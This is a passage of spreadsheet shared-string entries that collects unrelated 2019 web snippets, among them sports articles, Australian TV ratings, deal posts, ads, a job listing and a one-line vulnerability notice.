    <t>https://bit.ly/2PctE6V source</t>
  </si>
  <si>
    <t>Cookernup residents will be celebrating 125 years since the town was founded on Saturday.</t>
  </si>
  <si>
    <t>The nine tips guide parents in raising boys who can manage their emotions, respect themselves and respect women.</t>
  </si>
  <si>
    <t>Race Imboden's gesture is just the latest in a series of protests and public statements made by sports figures in the US including NBL coach Steve Kerr.</t>
  </si>
  <si>
    <t>handle_messages in eXtl_tls.c in eXosip before 5.0.0 mishandles a negative value in a content-length header. Published at: August 14, 2019 at 06:15AM View on NVD website The post New vulnerability on the NVD: CVE-2014-10375 appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Downing Street has hit back at a senior Channel 4 executive after she branded Prime Minister Boris Johnson a “known liar” and a “coward”. Read more? Click here</t>
  </si>
  <si>
    <t>SUPERCABS have been deployed on the motorway to catch motorists committing a number of different offences on the UK motorway network. Daily Express :: Cars Feed</t>
  </si>
  <si>
    <t>Festival balloons may have been grounded by the weather but as aircraft they still have to be airworthy. The post How do you MOT a hot air balloon? appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>submitted by /u/chkas [link] [comments]</t>
  </si>
  <si>
    <t>Neil Langer</t>
  </si>
  <si>
    <t>It’s been a long time since there was a air of excitement at St James Park. I know Bruce wasn’t a popular choice, but I’m starting to feel it returning after our recent transfer activity. Our spend has been nothing spectacular in terms of the Premier League, but let’s accept the positives – somehing I feared would never arrive this summer after no signings, no communication, no takeover and, eventually, no Rafa across a draining June and July. Joelinton looks a proper player, Saint-Maximin lit up St James’ in an exciting 30 minute cameo on Saturday and Willems looks a tidy player too. It’s all down to Steve Bruce now, whether we like it or not. He’s not Rafa but he’s got good man management skills which could help areas of this talented squad thrive. Some will still be seething that he’s the man in charge, but it feels like he’s kept the team spirit high and he’s allowed the team to play with a bit more freedom based on our last few pre-season showings. I don’t expect us to sign many more players now, but a e must keep Martin Dubravka and Sean Longstaff, despite some concerns that they might yet leave should big clubs come in with sizeable bids late on. Dubravka is our only choice between the posts. Darlow isn’t a Premier League goalkeeper, Woodman is now at Swansea for the season and Elliot is nowhere to be seen. Hopefully that means there’s ZERO chance of us cashing in.. As for midfielders, Steve Bruce was giving Jack Colback match time, but I’m glad to see he’s not been involved at all in our final two friendly’s. Not only has Sean Longstaff got back fit, looking as good as ever, his younger brother has burst onto the scene and scored a screamer vs St Etienne. It appears obvious that there are no new owners on the horizon, so I’m just glad Mike Ashley has eventually backed Steve Bruce with the new signings and an injection of attacking flair our squad severely backed. He can’t stop here though. Come on Mr Ashley, deliver another 2 quality signings, ensure we hang on to Dubravka and Sean Longstaff and let’s start this season on a genuinely positive note! I would take 5 points from our first five fixtures, Arsenal (h), Norwich City (a), Spurs (a), Watford (h) and Liverpool (a), but it looks a tough ask.</t>
  </si>
  <si>
    <t>samanthadehaas</t>
  </si>
  <si>
    <t>Be in control with your greatest asset…your health! FREE Health Check Up (valued at $159) that may include: • Risk assessment of Skin Cancer, Bowel Cancer, Cardiovascular disease • Diabetes risk assessment • Hearing and vision check, Glaucoma screening, Oral health • Osteoporosis risk • Lung function, kidney and liver function • Chronic illnesses • Cholesterol check • Reproductive health, sexual health screening, contraception, family planning • Prostate screening + lots more! *For new patients only Head to the link below to find out more and request your appointment! https://www.healthmint.com.au/health-checks</t>
  </si>
  <si>
    <t>Korean Vietnamese Dictionary – travel dictionary to translate Korean to Vietnamese. Click on the list to show Korean or Vietnamese synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Korean Vietnamese Dictionary →</t>
  </si>
  <si>
    <t>Uplay launcher required. Steps to get this game - Option 1 (with VPN)- 1) Install the Hoox VPN Addon in Chrome or Firefox 2) Log in/Sign up to a new account. 3) Connect to South Korea 4) Click on this link. 5) You should see this - Get your free copy! Sign up to get your free copy of Assassin's Creed® Brotherhood you'll be able to play anytime! You can claim the game from July 28th at 01:00 to August 4th at 01:00 (your local time). Option 2 (without VPN - may work for some) - 1) launch UPlay and sign in 2) click on this link 3) Click blue button on right hand side. 4) In the pop-up box, click on left if you already have Uplay. Click right if you need to install Uplay. (thanks mckim).</t>
  </si>
  <si>
    <t>Set sail and explore the Great Barrier Reef in style. Hire a crew or take the helm of your own vessel and go bareboating along the Whitsundays breathtaking reefs and islands. Whether on an ocean racer, tall ship, luxury yacht or launch, there’s a sailing experience to suit your skills. Island hop your way from […] The post How to bareboat in the Whitsundays appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Ricky Hatton, the former pro boxer who dropped $1500 on a piece of steak while on holiday in Mykonos, is heading home from his “f***ing expensive” Greek trip — and is still fuming after shelling out on the expensive steak.</t>
  </si>
  <si>
    <t>Photo by Bryan Lynn/Icon Sportswire via Getty Images Only players who have less than three accrued seasons can spend up to three years on the practice squad. With less than week remaining until the NFL teams have to make their final roster cuts by 4 PM this Saturday, there will be several players taking the field for their last game Thursday night for the Steelers. While some players may be fighting for a spot on the 53-man roster, other’s are hoping to impress any NFL team with their in-stadium play in order to find their way onto any practice squad. Additionally, the Steelers have been choosing most of the players for their 11-man practice squad from their own preseason roster. So which players currently with the Steelers are still eligible for the practice squad? I outlined the rules behind practice squad eligibility extensively in and article last week which can be seen HERE. In summary, and player with less than three accrued season and less than three previous years on an NFL practice squad are eligible. Practice squads can have a maximum of four players who have an NFL season where they were on the active game-day roster at least nine times in a season. These players will be noted with a “+” following their name. Before getting into the list, there are three players who have some unusual circumstances I would like to explain: Johnny Holton– On the Raiders active roster in 2016 and 2017, Holton spent all but one game on the practice squad last season. Although he has three years total, he only has two accrued seasons and year lost of practice squad eligibility. Mike Hilton– While he spent time on both the Patriots and Steelers practice squads in 2016, his total time was not enough to count against him for the year. So even though he has two accrued seasons, Hilton currently has three more years of practice squad eligibility going into 2019. Jordan Dangerfield– This situation might be the trickiest of all. Dangerfield didn’t make any NFL team or practice squad in 2013 before joining the Steelers before the 2014 season. Originally cut to start the season, Dangerfield was not signed to the practice squad until just before game 10 of 2014. Dangerfield did not use a year of practice squad eligibility because the Steelers promoted him to the active roster for the final three games. Therefore Dangerfield did not use an accrued year or a year on the practice squad. With practice squad years of 2015 and 2017, Dangerfeld accrued years in 2016 with 14 games and 2018 with all 16 games. Therefore Dangerfield has one more year of practice squad eligibility remaining. Offense Quarterback (3) Joshua Dobbs+, Mason Rudolph, Devlin Hodges Running Back (6) James Conner+, Jaylen Samuels+, Benny Snell Jr, Trey Edmunds+, Malik Williams, Travon McMillian Wide Receiver (9) JuJu Smith-Schuster+, James Washington+, Diontae Johnson, Ryan Switzer+, Trey Griffey, Johnny Holton+, Tevin Jones, Diontae Spencer, Brandon Reilly Tight End (5) Zach Gentry, Kevin Rader, Christian Scotland-Williamson, Trevor Wood, Mickey Crum Offensive Line (9) Chukwuma Okorafor+, Jerald Hawkins, Zach Banner, Derwin Gray, Damian Prince, Patrick Morris, J.C. Hassenauer, Garrett Brumfield, Fred Johnson Defense Defensive Line (6) Isaiah Buggs, Conor Sheehy, Winston Craig, Casey Sayles, Greg Gilmore, Henry Mondeaux Outside Linebacker (6) T.J. Watt+, Olasunkanmi Adeniyi, Sutton Smith, Tuzar Skipper, Christian Kuntz, Jayrone Elliott Inside Linebacker (4) Devin Bush, Ulysees Gilbert III, Robert Spillane, Tegray Scales Cornerback (6) Mike Hilton+, Jordan Dangerfield+, Cameron Sutton+, Justin Layne, Brian Allen+, Marcelis Branch, Trevon Mathis Safety (6) Terrell Edmunds+, Marcus Allen, Kam Kelly, Dravon Askew-Henry, P.J. Locke Specialists Mathew Wright, Ian Berryman, Kameron Canaday+ Offense: 32 Defense: 28 Specialists: 3 Total: 63 I think it’s safe to say at least 20 of these players will be on the Steelers’ 53-man roster come Saturday evening. The better question is, other than Christian Scotland-Williamson who receives an extra spot due to the International Pathway Program, which 10 players can you see the Steelers keeping on their practice squad? Feel free to give your thoughts in the comments below.</t>
  </si>
  <si>
    <t>Shares are TBA Report: Top 20 Programs Channels: All Free-to-Air Market: 5 City Metro (aggregate figure), Sydney, Melbourne, Brisbane, Adelaide &amp; Perth Demographics: Total People Day-part: 02:00 – 26:00 Day: Saturday Date: 17/08/2019 Deliverable: Overnight Ave AUD Ave AUD Ave AUD Ave AUD Ave AUD Ave AUD Metro 5 Cap City Sydney Melbourne Brisbane Adelaide Perth 1 SEVEN NEWS – SAT Channel 7 788,000 197,000 206,000 160,000 119,000 107,000 2 NINE NEWS SATURDAY Channel 9 672,000 187,000 222,000 125,000 83,000 54,000 3 THE MID-YEAR ASHES: SECOND TEST -ENG V AUS -SESSION 2 -D4 Channel 9 530,000 88,000 238,000 63,000 48,000 92,000 4 THE MID-YEAR ASHES: SECOND TEST -ENG V AUS -SESSION 1 -D4 Channel 9 506,000 115,000 211,000 93,000 45,000 42,000 5 ABC NEWS-SA ABC 502,000 129,000 176,000 80,000 63,000 54,000 6 AGATHA CHRISTIE’S AND THEN THERE WERE NONE-EV ABC 405,000 114,000 130,000 65,000 41,000 55,000 7 THE MID-YEAR ASHES: SECOND TEST -ENG V AUS -LUNCH -D4 Channel 9 395,000 75,000 174,000 73,000 33,000 39,000 8 SEVEN’S AFL: SATURDAY NIGHT FOOTBALL Channel 7 391,000 22,000 151,000 15,000 98,000 105,000 9 RUGBY: 2019 WALLABIES V NEW ZEALAND TEST LIVE Channel 10 320,000 139,000 36,000 87,000 9,000 49,000 10 POLDARK-EV ABC 271,000 63,000 91,000 42,000 34,000 40,000 11 BORDER SECURITY – AUSTRALIA’S FRONT LINE (R) Channel 7 263,000 105,000 95,000 41,000 22,000 12 SEVEN’S AFL: SATURDAY NIGHT FOOTBALL – PRE MATCH Channel 7 259,000 15,000 107,000 5,000 91,000 40,000 13 SEVEN’S AFL: SATURDAY NIGHT FOOTBALL – POST MATCH Channel 7 244,000 11,000 90,000 9,000 44,000 89,000 14 THE MID-YEAR ASHES: SECOND TEST -ENG V AUS -SESSION 3 -D4 Channel 9 241,000 37,000 106,000 32,000 22,000 44,000 15 NINE NEWS: FIRST AT FIVE Channel 9 239,000 76,000 68,000 33,000 24,000 37,000 16 WEEKEND SUNRISE – SAT Channel 7 239,000 64,000 62,000 49,000 28,000 35,000 17 M- CINDERELLA Channel 7 238,000 113,000 85,000 40,000 18 SATURDAY NIGHT NRL LIVE Channel 9 216,000 129,000 6,000 74,000 2,000 6,000 19 THE MID-YEAR ASHES: SECOND TEST -ENG V AUS -PRE MATCH -D4 Channel 9 213,000 42,000 115,000 20,000 21,000 15,000 20 WEEKEND TODAY – SATURDAY Channel 9 210,000 78,000 53,000 47,000 11,000 21,000 Free to Air: 25-54 demographics (Overnight) Ave AUD Ave AUD Ave AUD Ave AUD Ave AUD Ave AUD Metro 5 Cap City Sydney Melbourne Brisbane Adelaide Perth 1 THE MID-YEAR ASHES: SECOND TEST -ENG V AUS -SESSION 2 -D4 Channel 9 234,000 31,000 112,000 32,000 20,000 40,000 2 SEVEN NEWS – SAT Channel 7 215,000 51,000 45,000 48,000 43,000 28,000 3 NINE NEWS SATURDAY Channel 9 201,000 69,000 58,000 34,000 18,000 22,000 4 THE MID-YEAR ASHES: SECOND TEST -ENG V AUS -SESSION 1 -D4 Channel 9 195,000 44,000 78,000 34,000 18,000 21,000 5 THE MID-YEAR ASHES: SECOND TEST -ENG V AUS -LUNCH -D4 Channel 9 179,000 34,000 78,000 31,000 15,000 21,000 Free to Air: 18-49 demographics (Overnight) Ave AUD Ave AUD Ave AUD Ave AUD Ave AUD Ave AUD Metro 5 Cap City Sydney Melbourne Brisbane Adelaide Perth 1 THE MID-YEAR ASHES: SECOND TEST -ENG V AUS -SESSION 2 -D4 Channel 9 209,000 20,000 110,000 33,000 14,000 31,000 2 THE MID-YEAR ASHES: SECOND TEST -ENG V AUS -SESSION 1 -D4 Channel 9 175,000 34,000 75,000 33,000 15,000 18,000 3 SEVEN NEWS – SAT Channel 7 175,000 44,000 36,000 34,000 39,000 22,000 4 THE MID-YEAR ASHES: SECOND TEST -ENG V AUS -LUNCH -D4 Channel 9 164,000 29,000 77,000 30,000 12,000 16,000 5 NINE NEWS SATURDAY Channel 9 152,000 52,000 43,000 24,000 15,000 17,000 Free to Air: 16-39 demographics (Overnight) Ave AUD Ave AUD Ave AUD Ave AUD Ave AUD Ave AUD Metro 5 Cap City Sydney Melbourne Brisbane Adelaide Perth 1 THE MID-YEAR ASHES: SECOND TEST -ENG V AUS -SESSION 2 -D4 Channel 9 123,000 11,000 65,000 24,000 7,000 16,000 2 THE MID-YEAR ASHES: SECOND TEST -ENG V AUS -SESSION 1 -D4 Channel 9 107,000 20,000 46,000 21,000 8,000 11,000 3 THE MID-YEAR ASHES: SECOND TEST -ENG V AUS -LUNCH -D4 Channel 9 101,000 17,000 49,000 20,000 6,000 9,000 4 SEVEN’S AFL: SATURDAY NIGHT FOOTBALL Channel 7 88,000 3,000 42,000 4,000 21,000 18,000 5 SEVEN NEWS – SAT Channel 7 87,000 21,000 22,000 10,000 23,000 11,000 © OzTAM Pty Limited 2019. The Data may not be reproduced, published or communicated (electronically or in hard copy) without the prior written consent of OzTAM. Program performance and ranking information subject to change when not based on final program logs. Ranking information is for individual episodes. Includes Preliminary data.</t>
  </si>
  <si>
    <t>Our pre-season coverage continues with a look at the lessons learned from three games contested on Tuesday. Manchester ...</t>
  </si>
  <si>
    <t>A whistleblower facing a string of charges after exposing debt collection tactics within the Australian Taxation Office has launched a GoFundMe campaign to help “level the playing field” and fund his defence.</t>
  </si>
  <si>
    <t>William Siong</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V Welcome to Team Prawfeed!! Thank you for taking the time to watch this video explaining what an Upsell and Downsell is and how some marketers are making it … source</t>
  </si>
  <si>
    <t>Bidders were out and about again at weekend auctions, and while prices are likely to rise they are likely to resume the same trajectory of the recent boom years.</t>
  </si>
  <si>
    <t>United States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Consumer Credit Counseling Service United States: Greensboro, North Carolina Consumer Credit Counseling Service | (888) 551-1270 by USA Consumer Credit Counseling, Felipe Escobar on Tuesday 20 August 2019 08:26 PM UTC-05 Consumer Credit Counseling Service United States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Consumer credit counseling services provide resources to help solve your money problems. Greensboro, North Carolina Consumer Credit Counseling Service | (888) 551-1270 Tuesday 20 August 2019 07:20 PM UTC-05 | Tags: greensboro north-carolina-consumer-credit-counseling-service-888-551-1270 https://youtu.be/RPSSnlquMuM Greensboro, North Carolina Free Consumer Credit Counseling Service call (888) 551-1270, Credit Repair, Debt Consolidation, Foreclosure Prevention, Student Loan Consolidation, Wage Garnishment and Vehicle Repossession solutions, Debt Management Plan, Bankruptcy Counseling and Pre-Filing Certificate, Mortgage Loan Modification, and Debt Settlement. Greensboro, North Carolina credit counseling services provide resources to help solve your money problems. Counselors discuss your entire financial situation and help you develop a personalized plan. They can assist you with starting a budget. And they can help you find educational programs on money management. Debt Collection A debt collector generally is a person or company that regularly collects debts owed to others, usually when those debts are past-due. This includes collection agencies, lawyers who collect debts as part of their business, and companies that buy delinquent debts and then try to collect them. The Fair Debt Collection Practices Act (FDCPA) prohibits debt collectors from using abusive, unfair, or deceptive practices to collect from you. The Servicemembers Civil Relief Act (SCRA) assists active-duty military with financial burdens. Under this act, you may qualify for a reduced interest rate on mortgages and credit card debts. It can offer protection from eviction. It can also delay civil court including bankruptcy, foreclosure, or divorce proceedings. To find out if you qualify, contact Greensboro, North Carolina Consumer Credit Counseling Service (888) 551-1270. While there is no universal program to help with personal debt, there are a number of local programs to help people in financial hardships. One of the main sources of financial hardship is due to illness and medical bills. Not only do people lose income, but medical debt can be very expensive. Left with no recourse, many people use up their savings and even run up credit card debt to pay medical bills and get medical care. Contact Greensboro, North Carolina Consumer Credit Counseling Service at (888) 551-1270 to learn about the many government sponsored programs available to help you get out of debt. http://www.tunesbaby.com/yt/?x=RPSSnlquMuM http://www.infinitelooper.com/?v=RPSSnlquMuM https://consumercreditcounselingserviceusa.blogspot.com/p/fort-worth-texas-consumer-credit_22.html http://creditcounselingconsumer.home.blog/fort-worth-texas-consumer-credit-counseling-service-888-551-1270-2/ http://californiacreditcounseling.video.blog/plantation-florida-consumer-credit-counseling-service-888-551-1270/ http://districtofcolumbiacreditcounseling.home.blog/stamford-connecticut-consumer-credit-counseling-service-888-551-1270/ via Greensboro, North Carolina Consumer Credit Counseling Service | (888) 551-1270 August 20, 2019 at 07:05PM Copyright © August 20, 2019 at 07:05PM Tags: greensboro north-carolina-consumer-credit-counseling-service-888-551-1270</t>
  </si>
  <si>
    <t>Justin Nguyen</t>
  </si>
  <si>
    <t>It did not take long for Sheldon Creed to win again in the Stadium Super Trucks. Four months removed from his latest run in the series, the two-time champion continued his winning ways by taking victory in Race #1 at Portland International Raceway. After dominating Friday qualifying in an effort that saw him drive fellow NASCAR driver Greg Biffle‘s Continental Tire truck in addition to his own SPEED Energy vehicle, Creed started at the back of a nine-driver grid that commentator Sean Sermini called “the deepest talent pool we’ve had in Stadium Super Trucks.” Bill Hynes started on the pole, followed by Biffle, Jeff Hoffman, Casey Mears, Gavin Harlien, Matt Brabham, Cole Potts, and Robby Gordon. The field organised single file through the first turn and ramp, with Hynes getting a strong jump to maintain the lead. At the back, Creed quickly began attacking Gordon for eighth. Biffle and Hoffman battled for second as Hynes led the opening lap, with Biffle winning out. As lap two began, Biffle attempted to close down on Hynes entering turn one, but locked his brakes and went wide before recovering to stay in second. Creed, Brabham, and Mears went three-wide as Creed slipped up to fifth. Mears eventually fell to last. On lap three, Biffle tried the same move on Hynes, diving into the inside groove, sending him, Hynes, Hoffman, and Harlien erratically through the turn’s chicane. Nevertheless, Biffle held onto his position as Hynes began to sink. Creed and Harlien drafted their way to the front, enabling the latter to catch up to Biffle before the two made contact, turning Biffle in turn twelve. Creed slipped by the sideways Biffle to take the lead with Hoffman in tow. At the rear, Hynes went wide into turn one before returning to the course. The competition caution came out during lap four. At the yellow, Creed led Hoffman, Harlien, Biffle, Brabham, Potts, Gordon, Mears, and Hynes. Much of the field bunched up coming to the restart on the following lap, leading to a scramble for position through turns one and two as Creed pulled away. With Creed and Harlien comprising the top two, Biffle and Hoffman fought for third in a duel of tyre manufacturers (Biffle’s Continental Tire vs. Hoffman’s Toyo Tires), with the latter winning out. Lap seven saw the second competition yellow. The top three consisted of Creed, Harlien, and Hoffman, with Biffle, Gordon, Brabham, Potts, Mears, and Hynes on the outside looking in. At the restart, Hoffman moved to the inside line as the rest of the field drafted their way on the outside, causing him to drop to the back. As a result, Biffle moved up to third. With two laps to go, Potts and Brabham dueled for fifth, with the latter clearing him. On the final lap, Biffle and Gordon – two former NASCAR competitors during the 2000s – battled for third. As Biffle kept Gordon at bay in addition to fighting with Harlien for second, Creed distanced himself to take his third win of the year and thirty-eighth of his career. Harlien held off Biffle for second in a Continental Tire podium sweep. Gordon took fourth, followed by Brabham, Potts, Mears, Hynes, and Hoffman. For Biffle, it is his third podium finish in as many weekends competing in the series. “Third place in Stadium Super Trucks today racing with Continental Tire on board,” Biffle posted on Facebook. “First time in the truck this weekend so let’s hope for a better finish tomorrow!”</t>
  </si>
  <si>
    <t>A deal with Network Ten is yet to be done but the A-League draw released on Thursday is tailor-made for a partnership with a free-to-air broadcaster.</t>
  </si>
  <si>
    <t>Experts say homeshare arrangements allow older or disabled Australians to stay in their homes, while others get access to stable and affordable accommodation.</t>
  </si>
  <si>
    <t>Chris O'Leary</t>
  </si>
  <si>
    <t>Micah Awe thinks about it and it’s almost like you can see him going back, standing on the field at Mansfield Summit High School in Arlington, TX. He was younger, he says, five-foot-nine, five-foot-10, maybe 180 pounds. He was still a linebacker. High school-aged Micah Awe looked across the field at the running backs his team had in practice. They were huge. “One of them was like a bowling ball. He was like five-foot-11, 230 pounds — in high school,” Awe said, emphasizing what he was dealing with. “We had a six-foot, 210-pound one and a six-foot, 215-pound guy.” He stops again for the reminder. In high school. “I remember one time the hole divided and it was just me and the bowling ball guy. His name was Taj. It was a natural selection thing. “It was either run or hit him. And I just smacked him. That was kind of the revelation. If I can do that when I’m five-nine, 180 pounds and now I’m bigger, faster, stronger…I don’t really care how big the person is. I’m going to run straight into them.” RELATED » Preview: Argos host Bombers to kick off Week 8 » Cauz: Don’t worry Argos fans, things will get better » O’Leary: Argos, Collaros come full circle » Buy Tickets: Bombers at Argos That moment was the birth of one of the hardest hitters that the CFL has today. There haven’t been a lot of highlights in the Toronto Argonauts season thus far, but Awe — now 25 and an even six-feet and 225 pounds — has been fighting his way through the first third of his team’s season, blowing people up and trying to will his team to its first win of the year. Along the way, Awe is establishing himself as one of the top young linebackers in the league. Through six games this year, he has 25 tackles (plus three on special teams), an interception and has forced and recovered a fumble, putting him on pace to make his third season in the CFL a career year. In spite of that, he sees more room for personal growth, which he thinks could help his team finally get into the win column. “I know what our record is. But honestly, from my point I know that if I play better, if I’m playing at an all-star level, if I’m playing at a hall of fame-level, maybe we’ll win. That’s that’s my motivation,” he said. Argos head coach Corey Chamblin said that what’s impressed him the most about Awe this season is the preparation he’s putting in. Awe’s a film junkie, watching extra tape with coaches after practice, studying opponents and trying to learn what they do and why. “He’s played well in terms of increasing his game in terms of with his eyes. That’s the biggest thing with me,” Chabmblin said. “You can see that his eyes are able to give him more information for him to be able to perform in a more instinctual way. And that’s the big thing, he’s becoming more of an instinctual player than he is just a see-ball, go-get-ball type of player.” You’re never supposed to be allowed to choose your own nickname, but you might have to make an exception for Awe. Unhappy with the name he had in his previous year and a half with the BC Lions — Baba Yaga, a boogeyman-type character from the movie John Wick — Awe looked at his jersey number, looked at the news and genius struck. #Area51 CFL players are leaning, the same way that more than a quarter-million people that signed up for the ill-thought-out craze did, that storming Area 51 may seem possible in theory, but is much more difficult in real life. On Thursday night, Bombers running back Andrew Harris will try his luck in Area 51. “I was just watching film, he was going against Ottawa,” Awe said. “Second-and-seven, spread them out, it’s empty, he’s on the third receiver side. He does a little out route, makes the receiver miss and he gets 60 yards. “It’s a challenge to me and I love it. I hope that situation happens (Thursday night). I’ll make the play. Harris is a good running back but to me it doesn’t matter who the running back is. I’m going to play you the same way, with the same focus. I’m going to try to hit you, I’m going to try to get you on a pass route, whatever it is.” There have been big hits this season but Chamblin thinks Awe’s best work is still in front of him. “I actually joke that there are some that he could have had that I really would have liked him to have,” he said. “It’s amazing that I’m still on him about his tackling because he’s so powerful. He’s had some good hits, but he can have some real powerful hits if he decides to be more explosive in his lower body.”</t>
  </si>
  <si>
    <t>Officers from the Environment Department this week raided a property near Violet Town in Victoria's north-east, discovering over 120 dead birds which appear to have been deliberately poisoned.</t>
  </si>
  <si>
    <t>cvas</t>
  </si>
  <si>
    <t>Great deal on this iconic charcoal BBQ. My Weber kettle still going strong at 34 years of age. Please be aware I believe this is the grey import so if you can deal with not having the local warranty and some charcoal baskets, then this is a steal. RRP $329 at the Aussie Weber store. Don't forget the usual cashbacks should apply on CR and SB</t>
  </si>
  <si>
    <t>kobescores</t>
  </si>
  <si>
    <t>Been looking at Club C 85's , good price for a great shoe plus free shipping. Enjoy Part of the 25% off Sitewide Deal</t>
  </si>
  <si>
    <t>Charles LeClaire-USA TODAY Sports The Steelers were back on the gridiron for another training camp practice, and we’ve got the recap for you! The Pittsburgh Steelers have just a few training camp practices left, and while there are times it is still considered “football in shorts”, the team has had plenty of news coming from these workouts heading into the preseason. Wednesday the Steelers returned to some sense of normalcy as the team continues to rebound after the loss of wide receivers coach Darryl Drake this past weekend. The weather cooperated, and the Steelers wore pads for practice for the last time during training camp. There were some highlights from camp, so let’s get down to business from Wednesday’s workout: 2 minute drill The Pittsburgh Steelers finished the practice with the two-minute drill, and this is always a very exciting part of any camp practice. The Steelers offense had two quarterbacks, Ben Roethlisberger and Joshua Dobbs, lead the team on one drive each. Wouldn’t you know the defense, yes the defense, actually won both of these drills. Chris Carter of DKPittsburghSports gives the breakdown of those drills: Defense wins both 2min drills w/forcing TO on downs vs Ben and an INT on Dobbs. Solid coverage most plays. Gilbert and Hilton had nice plays over the middle, Vance caught a good floater from Ben. Dobbs INT looked like an overthrow on Switzer’s hook. #Steelers #dkps — Christopher Carter (@CarterCritiques) August 14, 2019 If you are wondering why Mason Rudolph wasn’t given a chance, according to Carter the team splits overall reps with both Dobbs and Rudolph, not necessarily in particular drills. Finney exits early Fans were concerned when they saw tweets like the one below from DKPittsburghSports’ Dale Lolley of B.J. Finney being carted up to the dorms from practice. BJ Finney just left practice early. Didn’t see what happened to him. #Steelers #Dkps — Dale Lolley (@dlolley_pgh) August 14, 2019 However, as it turns out, Mike Tomlin said after practice Finney left practice due to heat related issues. Tomlin says Finney was carted off earlier due to heat concerns. “Normal August football stuff there,” he says. Indicated no major injury there as JC Hassenauer played center today. #dkps #Steelers — Christopher Carter (@CarterCritiques) August 14, 2019 Walking Wounded Update There were plenty of Steelers who were held out of practice Wednesday, but there was also some good news as players like Maurkice Pouncey, Joe Haden and Vince Williams are nearing their return back to the practice/playing field. The #Steelers are in pads today. Maurkice Pouncey, Joe Haden, and Vince Williams are on the field, but not in uniform. — Missi Matthews (@missi_matthews) August 14, 2019 Another late addition, Zach Gentry. — Missi Matthews (@missi_matthews) August 14, 2019 Devin Bush also is not practicing. He is in uniform but is wearing a floppy hat. — Joe Rutter (@tribjoerutter) August 14, 2019 Camp Darling falling behind When the Pittsburgh Steelers selected Northern Illinois outside linebacker Sutton Smith in the 6th round of the 2019 NFL Draft, fans fell in love. A spark plug of a player who can play multiple positions, but fans haven’t seen much of him since camp started as he has been nursing in undisclosed injury. With him likely not playing on Saturday night, Tomlin was asked if he was falling behind, and his answer was precise. When asked if Sutton Smith is falling behind, Mike Tomlin simply replied “Yes.” #Steelers #dkps — Dale Lolley (@dlolley_pgh) August 14, 2019 Not a good comment from a head coach when it comes to a player whose spot on the team is anything but solidified. Seven Shots The offense has absolutely dominated the seven shots drill throughout Training Camp, and why would anything change now? The Offense wins 4-3, and Chris Carter gives us the breakdown of what went down. And #Steelers 7 shots in the books, offense wins 4-3. Ben goes 2-4 with TDs to Vance &amp; JuJu. One breakup by Edmunds on an amazing jump. Edmunds has INT on reverse pass from JuJu. Dobbs goes 2-3 with 2 TDs to Johnson and a great throw to Grimble but 1 foot out. #dkps — Christopher Carter (@CarterCritiques) August 14, 2019 Last day in pads As I said earlier, the Steelers will wrap up training camp on Thursday, their final open practice, and that meant Wednesday was the last padded practice of the 54th Training Camp at Saint Vincent College in Latrobe, PA. Coach Tomlin said today was the last day in pads for the team in Latrobe. Thursday is the final #SteelersCamp practice open to the public and media. — Missi Matthews (@missi_matthews) August 14, 2019 PODCASTS VIDEOS #LIVE: Coach Tomlin addresses the media following Wednesday’s practice. https://t.co/oPJhB0xxQY — Pittsburgh Steelers (@steelers) August 14, 2019 #LIVE: The crew takes you through today’s practice report, gives an update on the defensive backs and more on #SteelersLive. https://t.co/WsWpI4JvC0 — Pittsburgh Steelers (@steelers) August 14, 2019 Alejandro Villanueva on Coach Drake: “Everyone respected him.” pic.twitter.com/pBX2oFu5hF — Pittsburgh Steelers (@steelers) August 14, 2019 Ray Sherman observes while Blaine Stewart barks out instructions and Marcel Pastoor throws passes to the Steelers receivers. pic.twitter.com/j2GHxTzTWS — Joe Rutter (@tribjoerutter) August 14, 2019 PHOTOS Joe Haden in good spirits as he plays catch with Terrell Edmunds before practice. Still out with a foot contusion but walking without a limp. pic.twitter.com/FqQasGPIgD — Ray Fittipaldo (@rayfitt1) August 14, 2019 After a preseason debut that Mike Tomlin called a ‘really solid performance’ based on performance, rookie linebacker Devin Bush is not practicing Wednesday. Bush had 10 tackles and a pass breakup against Tampa Bay. pic.twitter.com/AHwvgESgGB — Jeremy Fowler (@JFowlerESPN) August 14, 2019</t>
  </si>
  <si>
    <t>Pinned onto Uncategorized Can Individuals with Dementia Consent to Sex? Implications for Resident to Resident Nursing Home Abuse Source by deebranch710</t>
  </si>
  <si>
    <t>Job Description: We are looking for a competent Office Administrator to provided secretarial and administrative support in a well organized and timely manner. You will work along with other staff members on a daily basis on a variety of tasks. Responsibilities: -Undertake the tasks of receiving calls, take messages, routing correspondence, arrange meetings and appointments .. Read more</t>
  </si>
  <si>
    <t>Chris Wilczynski, ASGCA, in conjunction with Ryangolf Corporation, has started construction of an 18-hole golf course at national home builder and developer Taylor Morrison’s Esplanade at Azario Lakewood Ranch community in Southwest Florida. Residents of Esplanade at Azario Lakewood Ranch will have access to the private course in addition to an array of planned resort amenities that include a wellness center, culinary center, resort-style pool, Bahama Bar, sports courts, state-of-the-art fitness center, fire pits and a full-time lifestyle manager located on site. Wilczynski, who has worked with Ryangolf on six other projects, including two other Esplanade golf courses in Southwest Florida, said construction began in February and is expected to be completed in late first quarter/early second quarter of 2020. “I have been making periodic visits to the property and everything is off to a great start,” Wilczynski said. “Ryangolf was selected after a bid process and is an extremely qualified contractor. It is good to be working with them again. We have a great team.” Five of the Esplanade at Azario course holes will be played along and through mature trees. “The treed holes, especially the par-3s, No. 12 and No. 17, will be particularly fun holes,” Wilczynski said. “The green at No. 12 is in a private enclave and No. 17 runs parallel to it, but in the opposite direction. Anytime you can build around mature trees the results are great golf holes.” The topography from which the Azario course is being created is typical of most Florida golf courses, relatively flat. “The golf course will be created by man and machine,” Wilczynski said. “We are digging several large lakes and using the soil from the excavation to construct the golf course, lots pads and roads. It’s a dramatic transformation given the scope of the earthwork and the process to build a project like this”. “It takes a lot of creativity to develop a terrific golf course,” Wilczynski added. “We work really hard to design and construct 18 different holes and greens. We want each hole to be unique while being fun, maintainable and aesthetically beautiful. The detailed planning process and hands-on approach during construction allow us to create this.” The course will have six sets of tees and play from 3,600 to 6,900 yards. “One of our main goals is to create a course that will be enjoyed by players with a range of golf abilities from beginner to experts,” Wilczynski said. “We are excited to work with Chris again as he understands our vision and helps us develop a golf course that complements and enhances our Esplanade community,” said Cammie 